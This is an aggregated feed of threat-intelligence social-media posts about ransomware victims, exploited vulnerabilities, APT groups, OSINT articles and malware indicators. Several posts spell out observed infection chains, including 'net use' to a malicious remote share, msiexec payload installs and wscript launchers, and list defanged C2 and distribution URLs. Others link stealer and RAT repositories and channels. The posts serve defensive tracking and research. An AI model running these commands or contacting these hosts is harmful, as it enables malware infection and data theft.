Notably, China-based threat actor Storm-1175, known for deploying Medusa ransomware, was observed exploiting all these vulnerabilities to obtain initial access. -- MsftSecIntel
Vulnerabilities exploited include Mirth Connect (CVE-2023-37679, CVE-2023-43208), ConnectWise ScreenConnect (CVE-2024-1709, CVE-2024-1708), JetBrains TeamCity (CVE-2024-27198, CVE-2024-27199), and Fortinet FortiClient EMS (CVE-2023-48788). -- MsftSecIntel
Meanwhile, Microsoft tracks more than 120 ransomware threat actors, including nation-state actors and cybercrime groups. These threat actors continue to exploit vulnerabilities in various software and services to gain initial access. -- MsftSecIntel
This period also saw the resurgence of Qakbot, which was observed leading to Basta deployments. Newer families like Knight/Ransomhub, INC, and Hunters international were also observed. -- MsftSecIntel
In the first quarter of 2024, established ransomware families like Akira, Lockbit, Play, and Phobos were still the most predominantly used in attacks observed by Microsoft. Microsoft now tracks 75 active ransomware families. -- MsftSecIntel
Applying the principle of least privilege, building credential hygiene, and deploying security solutions that provide unified visibility into the end-to-end cyberattack chain are crucial to building durable in-depth defense against ransomware. msft.it/60 -- MsftSecIntel
A tampering technique that is particularly popular among financially motivated actors is Bring Your Own Vulnerable Driver (BYOVD). msft.it/6013YDwpU -- MsftSecIntel
Post-compromise, many ransomware actors abuse remote monitoring and management (RMM) tools. They also continue to attempt tampering with security products using malware, publicly available software, or custom malicious scripts and commands. -- MsftSecIntel
2/xEspecialmente si "ofrecen" esos servicios.El moralismo es desesperante.E inútil, la mayoría de las veces. -- n4hualH
1/xRecientes declaraciones de algunos miembros de la comunidad de ciberseguridad me llevan a decir (otra vez):Interactuar con actores de amenazas con el fin de extraer información NO es un delito.Es Inteligencia.Recomiendo, de verdad, leer un poco más de -- n4hualH
Idea polémica: Utilizar el análisis sobre el desarrollo del fenómeno delictivo de García Luna para explicar el desarrollo del cibercrimen en México. -- n4hualH
Organized Cybercrime exists basically because as a business model, it works.Like, you know, physical or traditional Organized Crime.There was Organized Cybercrime before Ransomware, and there will be Organized Cybercrime after Ransomware. -- n4hualH
Kazakh Towns Inundated as Spring Flooding Hits dlvr.it/T5kcS3 #bellingcat -- osintbear
How to lose your CTF? — Retex et write-up (partiel) de l’HEXA OSINT CTF V3 dlvr.it/T5jstk #OSINT #Medium -- osintbear
The Art of OSINT: Unveiling the Invisible in Plain Sight dlvr.it/T5j5XG #OSINT #Medium -- osintbear
Unveiling the Corporate Veil: A Guide to OSINT Investigations on Businesses & CEOs dlvr.it/T5j5Vg #OSINT #Medium -- osintbear
Waltuhium Grabber810404df029951f47c930245ed323daaTelegramhttps://t[.]me/s/waltuhiumhttps://t[.]me/waltuhltchttps://t[.]me/s/waltuhiumvouchesGitHubhttps://github[.]com/waltuhium23/waltuhium#WaltuhiumGrabber #IOC -- suyog41
How to use Atheris to fuzz Python C extensions by Matt Schwager (@trailofbits)blog.trailofbits.com/2024/02…#fuzzing #cybersecurity -- 0xor0ne
Constantly updated collection of links to blog posts, write-ups and papers related to cybersecurity, reverse engineering and exploitationgithub.com/0xor0ne/awesome-l…#cybersecurity #infosec -- 0xor0ne
Getting started with Ghidra debugger (Official Ghidra documentation):github.com/NationalSecurityA…#ghidra #reverseengineering -- 0xor0ne
Cyber Legion Staff RideSAVANNAH, Ga. – The 782d Military Intelligence Battalion (Cyber) conducted a Staff Ride to Savannah, Georgia to learn about the 1779 Battle of Savannah, April 18. Following the tour, the team enjoyed lunch, team building, and traini -- 780thC
It’s the 5th and final day of the #FOR589 ALPHA, it’s the Capstone CTF involving our very own custom cybercrime forum! 😎👾🔍🚩 -- bushidotoken
Journey into the world of Deepfakes!Dive into the tools and tactics journalists and fact-checkers are using to detect and combat the deepfake invasion.gijn.org/stories/spotting-de…@gijn#OSINT #Deepfake #investigation #cybersecurity #intelligence #threatin -- DailyOsint
UK Police Take Down LabHost Phishing Service decipher.sc/uk-police-take-d… #decipher #deciphersec -- DecipherSec
It's Friday, and you know what that means.Decipher Podcast: Source Code 4/19 decipher.sc/decipher-podcast… #decipher #deciphersec -- DecipherSec
oh Linkedin, thank you, thank you, I feel so special. can't wait to start pR0Duc1ing 1nfl00ential C0nTenT for you for fr33 -- Hexacorn
Our threat brief on #CVE20243400 has been substantially updated. Updated sections include Current Scope of the Attack and the section on Operation MidnightEclipse activity. bit.ly/43YOECb -- unit42_intel
2024-04-18 (Thursday): #SSLoad infection leads to #CobaltStrike DLL. In this case we saw no follow-up Cobalt Strike C2 traffic. List of indicators available at bit.ly/3Q9SORR#TimelyThreatIntel #Unit42ThreatIntel #Wireshark #InfectionAnalysis -- unit42_intel
We are happy to announce we are pregnant, not pregnant, and segfaulting (chemically) -- vxunderground
We're no longer able to differentiate between cryptodrainers and celebrity publicity stunts(its always still a scam)(Chris Rock's Twitter is probably compromised) -- vxunderground
Thank you, @HackingLZ for sharing this information. We couldn't tag you in the post. -- vxunderground
MITRE was compromisedShout out Charles Clancy for full disclosure and his transparency. -- vxunderground
Update: Developers for Team Fortress 2 64bit said the false-positive from AV vendors was because this particular binary was not signed. Signing the binary resolved all issues.¯\_(ツ)_/¯ -- vxunderground
Note: some binaries were already compiled from the previous leak* -- vxunderground
Following the return of HelloKitty ransomware group (now HelloGookie), the individuals behind HelloKitty ransomware group released more files from CD Projekt Red – the game studio behind The Witcher and Cyberpunk 2077.Using the leaks nerds have compiled T -- vxunderground
Someone made us this. -- vxunderground
.@crocodylii found Hunters International ransomware group left their Tor domain publicly indexable 😭😭😭😭 -- vxunderground
Malware review: 2024-03-26 - Malware Disguised as Installer from Korean Public Institution (Kimsuky Group)- Masquerades as installer (0 points)- Masqueraded installer is not functional (-1 points)- Dropper is signed (+1 points)- Drops src.rar (-1 points)- -- vxunderground
No, we don't think Team Fortress 2 64bit version is malware. It's a false positive from AV vendors.It's going to be okay, we promise. -- vxunderground
Thank you, @hasherezade for producing these cool and badass hoodies.PE-BEAR ATE MY MALWAREZ -- vxunderground
Group: huntersApprox. Time: 02:50 19/04/24Title: Mid-South Health Systems -- RansomwareNews
Group: lockbit3Approx. Time: 02:50 19/04/24Title: sierraconstruction.ca -- RansomwareNews
No Embargo In Sight: Meta Lets Pro-Russia Propaganda Ads Flood The EU (AI Forensics): aiforensics.org/work/meta-po… -- 780thC
According to AI Forensics, a known network has been targeting EU voters on Meta platforms (Facebook, Instagram, Messenger and Threads) with pro-Russian propaganda in France and Germany | infosecurity-magazine.com/ne… @InfosecurityMag -- 780thC
“What you see in Volt Typhoon is an example of how China has approached establishing access to put things under threat,” Gen. Timothy D. Haugh | nytimes.com/2024/04/17/us/po… @nytimes -- 780thC
"Information operations are foundational for every operation that the department will do going forward. We have to be thinking about the information environment component of those activities,” Gen. Timothy Haugh defensescoop.com/2024/04/17/… @DefenseScoop -- 780thC
Nation-states engage in US-focused influence operations ahead of US presidential election (MTAC): blogs.microsoft.com/wp-conte… -- 780thC
Russian efforts are focused on undermining U.S. support for Ukraine while China seeks to exploit societal polarization and diminish faith in U.S. democratic systems. blogs.microsoft.com/on-the-i… @MsftSecIntel -- 780thC
@DarkWebInformer @H4ckManac @elhackernet @1ZRR4H -- alvieriD
Hello KittyNew Hello Gookie @briankrebs @campuscodi@GossiTheDog @3xp0rtblog /gookie256cvccntvenyxrvn7ht73bs6ss3oj2ocfkjt5y6vq6gfi2tad[.]onion -- alvieriD
Hello how about some proof? -- alvieriD
Play Ransomware posts 7 new victims including the Pennsylvania Convention Center in Philadelphia. @PhillyInquirer -- alvieriD
NewINC Ransom is behind the alleged new Mount Carmel Clinic breach. -- alvieriD
Cleveland NEON Health Centers have been breached by Medusa Team. Patient and employee data of all 8 centers exposed in samples provided. -- alvieriD
Well done bros -- alvieriD
RansomHub just breached their first critical infrastructure electric utility …or did they?No they breached a convenience store where you can pay your utility bills.Empresa de Energia del Bajo Putamyo -- alvieriD
The #Sleuthcon agenda is out! Check out my slot to see if it piques your interest 🔍🇷🇺 sleuthcon.com/xakep-repa-pro… -- bushidotoken
New advisory from CISA on #Akira 🔒— As of January 1, 2024, the Akira ransomware group has impacted over 250 organizations — It has claimed approximately $42 million (USD) in ransomware proceeds.More TTPs described too:cisa.gov/news-events/cyberse… -- bushidotoken
We’re going deep into the cybercrime underground today in DAY 4 of #FOR589 🕵🏻‍♂️🕵🏻‍♀️ 👾 ☣️ -- bushidotoken
Nice win for UK cyber cops 🇬🇧invidious.no-logs.com/watch?v=8Q21gXWI… -- bushidotoken
📊 This week's #OSINT #poll #question.Which type of ransomware attack is most prevalent in recent cyber threats?#reconnaissance #investigation #intelligence #tool #cybersecurity #infosec -- DailyOsint
OpenMetadata Bugs Enable Kubernetes Cryptomining Attacks decipher.sc/openmetadata-bug… #decipher #deciphersec -- DecipherSec
New podcast with Cody Stokes of Procellis Technology, a @USMC veteran who has had an unusual trajectory in his security career.Decipher Podcast: Cody Stokes decipher.sc/decipher-podcast… #decipher #deciphersec -- DecipherSec
Sandworm Group Shifts to Espionage Attacks, Hacktivist Personas decipher.sc/sandworm-group-s… #decipher #deciphersec -- DecipherSec
New video with @Mandiant analysts Dan Black and @gabby_roncone on the continued evolution of #sandworm and its recent promotion to APT44.invidious.no-logs.com/WlUa22LvM6U?si=dpfU… -- DecipherSec
New @CISAgov advisory on Akira ransomware activity and TTPs. cisa.gov/news-events/cyberse… -- DecipherSec
We’ve found a way to interact securely in the interconnected worlds of IT and OT, and we can’t wait to tell you about it. Our visionary, game-changing concept, called Cyber Immunity, offers protection even from as-yet-unknown threats, supporting the trans -- e_kaspersky
We are kick-starting the Kaspersky Cyber Immunity conference with H.E. Al Kuwaiti as honorable guest at the museum of the future in Dubai -- e_kaspersky
#DuneQuixote campaign targets Middle Eastern government entities with “CR4T” #malware.Technical analysis 👉 kas.pr/4wx2 -- e_kaspersky
LockBit #ransomware group has added 4 new victims to their #darkweb portal. - Sagacious IP- ABL Inc- Tri-State Truck & Equipment 🇺🇸- Craig Wire Products 🇺🇸#USA#lockbit #databreach #cyberattack -- FalconFeedsio
BlackBasta #ransomware has added Doyon (doyon.com) to their victim list.#USA#BlackBasta #cti #cyberattack #darkweb #databreach -- FalconFeedsio
Just hours after declaring further targeting of Breach Forum, the hacker group Rootk1t ISC announced the shutdown of their own Telegram channel.😀 -- FalconFeedsio
NoName continues to target Spain.- Asamblea de Madrid- Gobierno del Principado de Asturias- FEPEX- IMDEA ENERGÍA- SURNE- Enagás- Bergé y Cía#Spain#ddos #cyberattack #cti #threatintel -- FalconFeedsio
RansomHub #ransomware group has added 2 new victims to their #darkweb portal.- Mercatino Franchising 🇮🇹- FabricaInfo 🇧🇷#Italy #Brazil#RansomHub #cyberattack #databreach -- FalconFeedsio
Ransomexx #ransomware group has added Asteco Property Management (asteco.com) to their victim list.#UAE#Ransomexx #cyberattack #darkweb #databreach -- FalconFeedsio
SYLHET GANG-SG claims to have targeted multiple Banking websites in Saudi Arabia.- Riyad Bank- Arab National Bank- Bank Albilad- Al Jazira Bank- Saudi National Bank- Saudi Awwal Bank#SaudiArabia#ddos #cyberattack #cti #threatintel -- FalconFeedsio
MEDUSA #ransomware group has added Lee University (leeuniversity.edu) to their victim list.#USA#medusa #cyberattack #darkweb #databreach -- FalconFeedsio
NoName claims to have targeted multiple websites in Spain.- Xunta de Galicia- Parlament de Catalunya- Generalitat Valenciana- Corts Valencianes- Parlamento de Galicia#Spain#ddos #cyberattack #cti #threatintel -- FalconFeedsio
INC RANSOM #ransomware group has added Delano Joint Union High School District (djuhsd.org) to their victim list.#USA#incransom #databreach #cyberattack #cti -- FalconFeedsio
The hacktivist group Black Maskers targeted the renowned influencer Nas Daily's website yesterday 😲. The impact of this incident is currently unknown 😶. @nasdaily#Cyberattack -- FalconFeedsio
The hacker group RootK1T is further targeting breach forums and its current owner, Baphomet. They also claim to enjoy support from the Cyber Army of Russia 🌐. However, the Cyber Army of Russia has yet to respond to these claims by RootK1T. #CTI #Databreac -- FalconFeedsio
🚨 Cybersecurity Alert for Jordan 🚨Jordan is currently facing an ongoing series of cyber attacks from multiple hacktivist groups. The BlackMaskers Team is actively targeting several key Jordanian entities, posing significant threats to both national infras -- FalconFeedsio
Cactus #ransomware group has added XD Connects (xdconnects.com) to their victim list.#Netherlands#Cactus #cti #cyberattack #darkweb #databreach -- FalconFeedsio
Blackout #ransomware group has added HT Hospitaltechnik Planning Company (ht-hospitaltechnik.de) to their victim list.#Germany#Blackout #cti #cyberattack #darkweb #databreach -- FalconFeedsio
Mydata/Alphalocker #ransomware group has added GEODIS (geodis.com) to their victim list.#France#cti #cyberattack #darkweb #databreach -- FalconFeedsio
Microsoft has tracked at least 70 Russian actors engaged in Ukraine-focused disinformation campaigns concentrated on undermining support for Ukraine. Meanwhile, China seeks to exploit societal polarization and diminish faith in US democratic systems: msft -- MsftSecIntel
Overview of the OSINT landscape in South Korea dlvr.it/T5gfq5 #OSINT #Medium -- osintbear
Business-focused OSINT with Netlas.io dlvr.it/T5gfll #OSINT #Medium -- osintbear
Open Source Intelligence Reddit Case Study | TryHackMe Advent of Cyber dlvr.it/T5gLhN #OSINT #Medium -- osintbear
DarkGPT — AI OSINT Tool Powered By ChatGPT-4 To Detect Leaked Databases dlvr.it/T5fm8H #OSINT #Medium -- osintbear
Visual Analysis Uncovers Target of Israeli Airstrike: Iranian Consulate in Damascus dlvr.it/T5hx52 #OSINT #Medium -- osintbear
Unlocking Insights Your Trusted Partner for Comprehensive Background Checks and OSINT… dlvr.it/T5hfr3 #OSINT #Medium -- osintbear
Identifying the Telltale Signs of Surveillance: Are You Being Spied On? dlvr.it/T5hfpj #OSINT #Medium -- osintbear
A Comprehensive Guide to OSINT Basics dlvr.it/T5hZ4F #OSINT #Medium -- osintbear
NiceRATCopycat of CStealerGitHubhttps://github[.]com/0x00G/NiceRATTelegramhttps://t[.]me/s/NicestRAThttps://t[.]me/areceoWebhttps://nicerat[.]com/#NiceRAT #RAT #Stealer #IOC -- suyog41
Stink Stealer- Python Stealer a3664d37321d58e90f0cd8d988216063#StinkStealer #Stealer #IOC -- suyog41
Sams Stealercb95c77750732c0a4dd29c1d4feb6f69#SamsStealer #Stealer #IOC -- suyog41
Reposted because we made over 9,000 typos (nearly impossible considering this is a small tweet) -- vxunderground
Yesterday @cahlberg , the CEO of @RecordedFuture, shared information on an unidentified Threat Actor attempting to SMS phish employees at their organization- This message was not sent to a Nikolas- Who the hell is Nikolas -- vxunderground
hacking is illegal and for nerds -- vxunderground
The author's alias is Gookee, not Gookie, but the ransomware name is Gookie lol. Sorry for the confusion. -- 3xp0rtblog
@BleepinComputer @vxunderground @ddd1ms @LawrenceAbrams @malwrhunterteam @pancak3lullz @sky31337 @AShukuhi @uuallan @Jon__DiMaggio @UK_Daniel_Card @SOSIntel @BushidoToken @BrettCallow @AlvieriD -- 3xp0rtblog
Different reports on our malware samples site can help you examine the malicious object. 🧵 5/10 -- anyrun_app
Apply one or several parameters to find a specific malicious example. Try it yourself with a possibly infected #IOC – use the filter, and similar cases will be displayed. 🧵 4/10 -- anyrun_app
You can find a sample by a #malware name, family, technique, and vulnerabilities that the malicious program exploits. All the trending tags are displayed on the dashboard. 🧵 3/10 -- anyrun_app
Explore fresh malware samples in the "Public Submissions" window. Dive into tasks uploaded by users and learn about #malware techniques. Premium subscribers can analyze tasks privately. Only public submissions shared with the community are available here. -- anyrun_app
🔍  Hunting for malware samples to boost your cybersecurity skills? Look no further! In this thread, we will guide you through accessing free #malware samples and reports using #ANYRUN. Let's dive in! 🧵 1/10 -- anyrun_app
#PureLogs is a stealer belonging to the Pure #malware family 🏴‍☠️ Delivered by the #PureCrypter loader, it steals browser data, crypto wallets, and even files. Learn more & collect its #IOCs/samples➡️ any.run/malware-trends/purel… -- anyrun_app
Exciting update from #ANYRUN: PowerShell Script Tracer! 🎉Simplify your #PowerShell analysis with:- Step-by-step script analysis- Detailed breakdown of every function- Easy way to connect related functions' inputs and outputsLearn more⬇️any.run/cybersecuri -- anyrun_app
We hope we've helped you understand the important basics of how to get started analysing malware. Sign up for a free account today and have a go! 🧵 10/10app.any.run/?utm_source=twit… -- anyrun_app
The best overview of a sample is to examine its events in the process graph. A brief look, and you already know what is going on here. 🧵 9/10 -- anyrun_app
You can also export or print this report in a preferable form – hide blocks by clicking on the “eye” icon. xport options include JSON Summary, IOC, HTML, Process Graph (SVG), and MISP format. 🧵 8/10 -- anyrun_app
Convenient reports prioritize key data at the top. Detailed reports cover sample info, behavior, screenshots, process data, registry, files, network, debug output, ensuring no vital details are overlooked. 🧵 7/10 -- anyrun_app
Explore hash sums, DNS requests, connections, and HTTP/HTTPS requests. Easily copy and filter data. Icons and the number of IOCs let you run through the report and understand what you are dealing with at once. 🧵 6/10 -- anyrun_app
Repeat after me: Patching an already compromised system won’t solve the problem#PaloAlto -- cyb3rops
Whoopsie Doodle -- DrunkBinary
Synapse Merge Request -- DrunkBinary
Passwords for a previously leaked (3years ago) "funnytorrent" that contained Witcher3, Gwent, CypherPunk 2047 and numerous other code sources from CD:Projekt RED have also been posted by the "HelloKitty" ransomware group. They have now rebranded to "Hello -- hackerfantastic
As part of the Lab Hosts phishing/eCrime arrests & takedown. UK police made a video bit mocking the attackers, it's pretty funny - news.met.police.uk/videos/la… -- hackerfantastic
Code Red rematch eta when? -- hackerfantastic
#phishing @ArubaithXXps://dsadsas-wondrous-site.webflow.io/hXXp://clienti-richiesta-home-aruba-it.codeanyapp.com/wp-admin/it/ -- JAMESWT_MHT
🤔 -- KorbenD_Intel
"Indeed Resume Export 4001901\.zip": c796ea83815c2ea21228a5e4964cbe2f8a297648fd6e37928c1c722600c15051"Indeed Resume Export 4001901.pdf.lnk": fba6c3f93838656c9627006913ad14a6d9645998e72df06f3df2107e0ddd4980🤔@1ZRR4H -- malwrhunterteam
"twilight.ps1": d25b41e53e2a97c4812952c52eaca675d31fc64b2179ef529ebafe9bd9f310ce"You are in a VM, it is getting late.. goodnight""You are in a VM cores le 2, it is getting late.. goodnight"😂 -- malwrhunterteam
-- malwrhunterteam
-- malwrhunterteam
-- malwrhunterteam
"healloves.apk": aded4a95327ffefd41a2cf059255b16563caad89478a4172c6d0d67f81551c42 -- malwrhunterteam
"dolsingcam.apk": 45c99e8f20059fdeb75651d25afce62e43d1bf8265c1e7adc9e9f97ff329ec67 -- malwrhunterteam
But seriously, the fuck is "we don't agree that the vulnerability is valid because you are not one of the persons who should find such things"? I have no idea what is going on in that/those people's head.Braindead idiots...🤷‍♂️ -- malwrhunterteam
Domain: prominade.xseller[.]comResolving to: 194.116.216[.]2172 other related domains resolving to that IP:id-resume.ldop[.]comcv-export.lookids[.]com -- malwrhunterteam
🔍Accessible detections🏭ICS Sub-Techniques🦹Under-represented groups🫡The sunset of TAXII 2.0And a whole lot more. Today ATT&CK's published our 2024 roadmap! Check out some of what's coming the rest of this year at medium.com/mitre-attack/atta…. -- MITREattack
Group: bianlianApprox. Time: 16:49 18/04/24Title: B Capital Group -- RansomwareNews
Group: bianlianApprox. Time: 16:49 18/04/24Title: JE Owens and Company PA. -- RansomwareNews
Group: bianlianApprox. Time: 16:49 18/04/24Title: Western Saw Inc. -- RansomwareNews
Group: blackoutApprox. Time: 14:47 18/04/24Title: ht-hospitaltechnik.de -- RansomwareNews
Group: cactusApprox. Time: 14:47 18/04/24Title: xdconnects.com\$50.5M\Netherlands\1TB\&lt;1% DISCLOSED -- RansomwareNews
Group: lockbit3Approx. Time: 12:51 18/04/24Title: sagaciousresearch.com -- RansomwareNews
Group: lockbit3Approx. Time: 12:51 18/04/24Title: ablinc.com -- RansomwareNews
Group: playApprox. Time: 00:54 19/04/24Title: SIS Automatisering -- RansomwareNews
Group: alphalockerApprox. Time: 10:56 18/04/24Title: geodis.com -- RansomwareNews
Group: playApprox. Time: 00:53 19/04/24Title: Pennsylvania Convention Center -- RansomwareNews
Group: ransomhubApprox. Time: 06:52 18/04/24Title: FábricaInfo <fabricainfo.com> -- RansomwareNews
Group: playApprox. Time: 00:53 19/04/24Title: P??????? & ???? -- RansomwareNews
Group: playApprox. Time: 00:53 19/04/24Title: JE Owens -- RansomwareNews
Group: playApprox. Time: 00:53 19/04/24Title: Engineered Automation of Maine -- RansomwareNews
Group: playApprox. Time: 00:53 19/04/24Title: Alltruck Bodies -- RansomwareNews
Group: lockbit3Approx. Time: 18:46 18/04/24Title: dc.gov -- RansomwareNews
Group: ransomhubApprox. Time: 16:49 18/04/24Title: Mercatino S.r.l. mercatinousato.com/ -- RansomwareNews
Group: akiraApprox. Time: 16:49 18/04/24Title: Myers Automotive Gro up -- RansomwareNews
Hear from @Praga_Prag & @synth_nic0 on the techniques used by adversaries to gain & sustain access within a domain, including:✅ Credential dumping✅ Active Directory configuration syncing✅ Kerberos protocol manipulation✅ Certificate abuse👀: ghst.ly/3PLDBX8 -- specterops
Learn how BloodHound Enterprise can streamline mitigation efforts, eliminate millions of Attack Paths, and improve your security posture. Schedule a demo w/ our experts at #RSAC 👉 ghst.ly/4aXr1fA. -- specterops
Talos' @ImmortanJo3 was on @NPR #AllThingsConsidered last night discussing the importance of #GPS in keeping Ukraine's power grid on, and what Talos is doing to protect it npr.org/2024/04/17/124536694… -- talossecurity
今天offline,感恩没有在大礼包上缩水,江湖再见! -- timele9527
Cisco Talos researcher Vanja Svajcer writes about the OfflRouter VBA macro virus afecting users in Ukraine. blog.talosintelligence.com/o… -- virusbtn
Zscaler's Roy Tay & Sudeep Singh observed a malvertising campaign pushing the MadMxShell backdoor. The threat actor registered multiple domains spoofing legitimate IP scanners and other software typically used by IT security & network administration teams -- virusbtn
WithSecure researchers look into Kapeka, likely a new addition to Sandworm’s arsenal, used in attacks against victims in Eastern Europe. Kapeka is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit. withsecure.co -- virusbtn
Google Mandiant researchers decided to graduate the Sandworm group into APT44 & release a report that provides additional insights into the group’s new operations, retrospective insights, & context on how the group is adjusting to support Moscow’s war aim -- virusbtn
It is fully cross platform***.Sorry, Marco. We made a typo (as is tradition). -- vxunderground
Half of the vx-underground roster were still not fully potty trained at 13, so we find this profoundly impressive. -- vxunderground
13-year-old Marco Liberale has created a proof-of-concept PasteBin C2 botnet in Go. Is it fully cross platform working on Windows, Linux, and Mac.We are very happy to see such a young person contributing to this research space.Check it out here: github.co -- vxunderground
17 AVs flag the newly released Team Fortress 2 64bit client as malware 😭SHA256: 83fb94ef1accdc0071ef6221f8e5acf870a1df31ff26e04a8d58116402793911 -- vxunderground
Hello, how are you? We've updated the vx-underground malware collection. We've added 68,000 new malware samples.Download the malware.- Virussign.2024.04.09- Virussign.2024.04.10- Virussign.2024.04.11- Virussign.2024.04.12- Virussign.2024.04.13- Virussign. -- vxunderground
tl;dr you're all going to prison forever (and ever) -- vxunderground
.@feege_ spotted a billboard advertisement on the i-95 in Philadelphia, near the Wells Fargo Center, that says: "Hackers Suck" "Protect your business. Cover your assets." -- vxunderground
Short blog post on bypassing BIOS passwords with hardware attackCredits @CyberCXInteresting reading if you're into hardware hackingblog.cybercx.co.nz/bypassing…#hardware -- 0xor0ne
Interesting reading (2022) for anyone into embedded/IoT devices analysis and exploitationExcellent research work by @hgarrereyn and @__comedianBlog post: margin.re/2022/06/pulling-mi…Slides (RECon): github.com/MarginResearch/re…#mikrotik -- 0xor0ne
Shall we say… Good bye, phishing queue? Part 2hexacorn.com/blog/2024/04/19…#SOC #phishing -- Hexacorn
Norton call back scam📞☎️Fake Scam number: +44 1245 790035Back in 2022 this number was used by a watch shop but it has been reissued to scammers using it for fraud⌚️ -- JCyberSec_
I'm heading out to Pittsburgh for NCFTA🖱️📢 I will be speaking on Telegram visibility on WednesdayIf you're going to be there drop me a DM let's grab a drink! 🍻 -- JCyberSec_
LabhostLabhostLabhostDOWN!!!! -- JCyberSec_
Samples 👇bazaar.abuse.ch/sample/3bca1…bazaar.abuse.ch/sample/dcae5…bazaar.abuse.ch/sample/3bca1… -- Cryptolaemus1
distrohttps://prominencedigiworld.]com/wp-content/plugins/hot-random-image/index.htmlhttps://gihibml.]org/vl.phphttp://krd6.]com/share/c2'shttp://85.239.53.]219/api/gatewayhttp://85.239.53.]219/download?id=Nevada&module=2&filename=None -- Cryptolaemus1
#SSLoad - #TA578 - url > .js > smb > .msi wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.jsnet use A: \\krd6.]com@80\share\ /persistent:nomsiexec.exe /I avp.msimsiexec.exe /V(1/3) 👇IOC'sgithub.com/pr0xylife/SSLoad/… -- Cryptolaemus1
Samples 👇bazaar.abuse.ch/sample/0112e…bazaar.abuse.ch/sample/44eb0…bazaar.abuse.ch/sample/1d6f7… -- Cryptolaemus1
distro:https://pankerfan.]com/accessinformationhttps://pankerfan.]com/eft-edi-customerc2's https://djibek.]com/https://www.savetheworldpodcast.]com/https://retrobox.]rockshttps://dreamerz.]vnhttps://www.briccodeldente.]it -- Cryptolaemus1
#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript Invoice_818493.jswscript out.jsC:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇\npp.8.6.3.portable.x64\plugins\mimeTools.dll(1/3) 👇IOC'sgithub.com/pr0xyli -- Cryptolaemus1
Microsoft has uncovered an attack that exploits critical vulnerabilities in OpenMetadata to gain access to Kubernetes workloads and leverage them for cryptomining activity. Get our analysis, IOCs, and investigation guidance: msft.it/6012YB57m -- MsftSecIntel
6/xEl canal en concreto fue creado apenas el 7 de abril, comenzando a publicar a partir del 13 del mismo.Otro dato es el nombre, pues el usuario es distinto al que es manejado en el foro, lo que puede hablarnos del inicio de una "marca personal". -- n4hualH
5/xComo ya se dijo, el actor de amenazas tiene un canal de Telegram, donde ha compartido otros logs similares, pertenecientes a otros países, etc. -- n4hualH
4/xPor lo tanto, parece muy poco probable que se tratara de la explotación de una vulnerabilidad en los servidores Gubernamentales, y más bien es el resultado del despliegue de una campaña dirigida contra los usuarios. -- n4hualH
3/xEn este caso, se trató de credenciales extraídas de dispositivos que fueron infectados con un Stealer, tipo de malware ampliamente utilizado por los cibercriminales para extraer este tipo de información, con el fin de ser accionada en otro tipo de deli -- n4hualH
2/xConcretamente, el listado de credenciales se encuentra en el apartado de "Stealer Logs" del foro.Este dato es importante, pues permite identificar el origen de la filtración. -- n4hualH
1/xRespecto a la filtración de credenciales de usuario reportada por @victor_ruiz hace unas horas, investigué un poco y encontré lo siguiente: -- n4hualH
Google Dorking dlvr.it/T5djmh #OSINT #Medium -- osintbear
Unveiling the Secrets of Cyberspace: A Journey with GoogleFU and OSINTgram dlvr.it/T5dFjP #OSINT #Medium -- osintbear
Open Source Intelligence Tools & Techniques Explained With Case Studies dlvr.it/T5cZDN #OSINT #Medium -- osintbear
Open Source Intelligence (OSINT) Market Analysis and Strategies | Current and Future Scenarios dlvr.it/T5cT2N #OSINT #Medium -- osintbear
Osintracker V2.7 — Connectors dlvr.it/T5cN06 #OSINT #Medium -- osintbear
OSINT Exercise #023 dlvr.it/T5c0Pz #OSINT #Medium -- osintbear
OSINT Exercise #020 dlvr.it/T5c0Pd #OSINT #Medium -- osintbear
Hunting and analysing (Windows) vulnerable kernel drivers by Takahiro Haruyama (@VMware)blogs.vmware.com/security/20…#Windows -- 0xor0ne
This is an excellent series on virtualization technologies and internals of various solutions (QEMU, Xen and VMWare)Credits @LordNoteworthyIntro: docs.saferwall.com/blog/virt…VMWare: docs.saferwall.com/blog/virt…Xen: docs.saferwall.com/blog/virt…QEMU: doc -- 0xor0ne
Very interesting reading on reverse engineering rail ticketseta.st/2023/01/31/rail-ticke…#reverseengineering #infosec -- 0xor0ne
Hackers Linked to Russia’s Military Claim Credit for Sabotaging US Water Utilities | wired.com/story/cyber-army-o… @WIRED -- 780thC
APT44: Unearthing Sandworm: services.google.com/fh/files… | Report "provides additional insights into the group’s new operations, retrospective insights, and context on how the group is adjusting to support Moscow’s war aims." -- 780thC
Unearthing APT44: Russia’s Notorious Cyber Sabotage Unit Sandworm | Given the active and diffuse nature of the threat posed by Sandworm globally, @Mandiant has decided to graduate the group into a named Advanced Persistent Threat: APT44. cloud.google.com -- 780thC
WithSecure uncovers Kapeka, a new malware with links to Russian nation-state threat group Sandworm | withsecure.com/en/whats-new/… @WithSecure -- 780thC
Another day another hacked account advertising a crypto scam. @Support Maybe I should work for @x to clear this all up here @elonmusk -- alvieriD
The original website was published last week and several more copycats have been set up with new iOS “zero-days.”@TrustWallet #CyberSecurity -- alvieriD
# new fake iOS zero-day exploit for sale<again>CodeBreach Lab is the same named lab who advertised the fake iOS iMessage exploit & mentioned also for $2 million.</again>credible intel -- alvieriD
UPDATE - ETAC tracks this leaked Babuk+LB3 using adversary as "ETG-01"+2 Ransom Notes:2024-04-15 | 39129f319a006fc4de1854412dc4c2313b47d27e8ea1c344774be4b887b1ca44 | AKGUM| 🇪🇸2024-04-13 | e2afade3e08b23b338a5c1dc86978541430dbd5e42ea79156eb2262eb5e3155d | -- bushidotoken
We’re kicking off Day 3 of #FOR589 aka “The Crypto Day” 🧱⛓️‍💥+🔒🔑+💰🤝 -- bushidotoken
They finally graduated cloud.google.com/blog/topics… -- bushidotoken
FSB officer sent to 9 years in maximum security penal colony for taking bribes from the Infraud cybercrime crewThis and more: mastodon.social/@campuscodi/… -- campuscodi
NASA's Earthdata Search provides user-friendly access to EOSDIS services, facilitating the discovery, filtering, visualization, and retrieval of Earth science data.worldview.earthdata.nasa.gov@NASA#GEOINT #OSINT #CTI #intelligence #ThreatIntel #infosec #c -- DailyOsint
Critical Crypto Bug Fixed in PuTTY decipher.sc/critical-crypto-… #decipher #deciphersec -- DecipherSec
The #sisense intrusion is still somewhat of a developing situation, with not a lot of details known at this point.invidious.no-logs.com/Uk3IkuzRGTU?si=WW__… -- DecipherSec
